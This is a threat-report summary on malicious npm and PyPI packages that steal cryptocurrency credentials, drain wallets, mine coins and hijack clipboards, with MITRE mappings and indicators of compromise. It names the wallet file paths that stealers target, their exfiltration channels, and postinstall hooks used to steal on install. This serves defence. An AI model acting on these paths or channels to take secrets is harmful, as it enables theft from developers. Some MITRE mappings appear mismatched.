Threat Research

2025 Blockchain and Cryptocurrency Threat Report: Malware in the Open Source Supply Chain

SocketDev
2025 Blockchain and Cryptocurrency Threat Report: Malware in the Open Source Supply Chain

Malicious open source packages targeting blockchain developers are increasingly used to steal cryptowallet credentials, drain funds, mine cryptocurrency, and hijack clipboard data. Threat actors, including nation-state groups, exploit supply chain vulnerabilities in registries like npm and PyPI, impacting ecosystems such as Ethereum, Solana, TRON, and TON. #ContagiousInterview #BeaverTail #InvisibleFerret #XMRig #ClipboardHijackers

Keypoints

  • 75% of malicious blockchain-related packages are hosted on npm, with others on PyPI and various registries targeting multiple blockchain platforms including Ethereum, Solana, TRON, and TON.
  • Four main threat classes dominate: Credential Stealers, Crypto Drainers, Cryptojackers, and Clipboard Hijackers (Clippers), each exploiting developer environments and CI/CD pipelines.
  • Credential Stealers extract seed phrases and private keys using techniques like filesystem scraping, browser profile harvesting, and embedding exfiltration in package lifecycle scripts.
  • Nation-state actors, notably linked to North Korea’s Contagious Interview campaign, use supply chain attacks with malware like BeaverTail and InvisibleFerret to steal millions in cryptocurrency.
  • Crypto Drainers immediately initiate on-chain transfers to siphon funds using obfuscated and probabilistic logic, often preserving small wallet balances to avoid detection.
  • Cryptojackers covertly hijack CPU/GPU resources within open source packages to mine cryptocurrency, exemplified by attacks on @rspack/core and klow packages.
  • Clipboard Hijackers continuously monitor and replace cryptocurrency wallet addresses on clipboards to redirect funds, evading detection through simple yet effective techniques.

MITRE Techniques

  • [T1056] Input Capture – Clipboard hijackers monitor and replace cryptocurrency wallet addresses in real time by polling system clipboards (“…continuously polls the system clipboard, applying regex patterns to identify wallet address formats…”).
  • [T1005] Data from Local System – Credential stealers scan wallet paths and browser profiles to extract sensitive files and credentials (“Stealer packages scan known wallet paths… and exfiltrate files without modification”).
  • [T1071] Application Layer Protocol – Malware exfiltrates stolen data using HTTP POST requests and messaging APIs like Telegram bots and Discord webhooks (“exfiltrating credentials via silent HTTP POST”, “embedding exfiltration logic via Telegram bots, Discord webhooks…”).
  • [T1197] BITS Jobs – Persistence is maintained through scheduled tasks and startup entries across multiple OSes (“Persistence is established via scheduled tasks or startup entries”).
  • [T1486] Data Encrypted for Impact – Credential stealers encrypt stolen private keys with hardcoded RSA-2048 keys before exfiltration (“captured the private key, encrypted it with a hardcoded RSA-2048 public key…”).
  • [T1114] Email Collection – Exfiltration through Gmail SMTP servers is used by some credential stealers (“exfiltrate credentials via Gmail”).
  • [T1204] User Execution – Social engineering techniques trick developers into installing malicious packages disguised as coding challenges (“impersonate recruiters and initiate staged interview processes to socially engineer targets”).
  • [T1059] Command and Scripting Interpreter – Malicious lifecycle scripts like postinstall and setup.py execute malware immediately upon package installation (“abuse package lifecycle hooks (postinstall in npm, setup.py in PyPI) to trigger credential theft immediately upon installation”).

Indicators of Compromise

  • [File Hashes] Examples of malicious package versions – @rspack/core and @rspack/cli v1.1.7 compromised with XMRig miner logic, ultralytics v8.3.41–8.3.46 injected with cryptomining payloads.
  • [Domains] C2 and exfiltration endpoints – cl1p[.]net used by PyPI package lsjglsjdv for clipboard exfiltration, public RPC endpoints like bsc-dataseed1.defibit.io and api.devnet.solana.com used for blockchain interactions.
  • [File Names/Paths] Targeted wallet files and directories – ~/.config/solana/id.json, ~/.ledger-live, ~/Library/Application Support/Exodus/exodus.wallet, and browser extension folders for MetaMask, Phantom, Binance Wallet, Coinbase Wallet.
  • [Package Names] Malicious or trojanized packages – monkey-patched PyPI libraries stealing Solana id.json, npm packages such as [email protected], multicogs, [email protected], solana-web3.js variants with credential theft.

Read more: https://socket.dev/blog/2025-blockchain-and-cryptocurrency-threat-report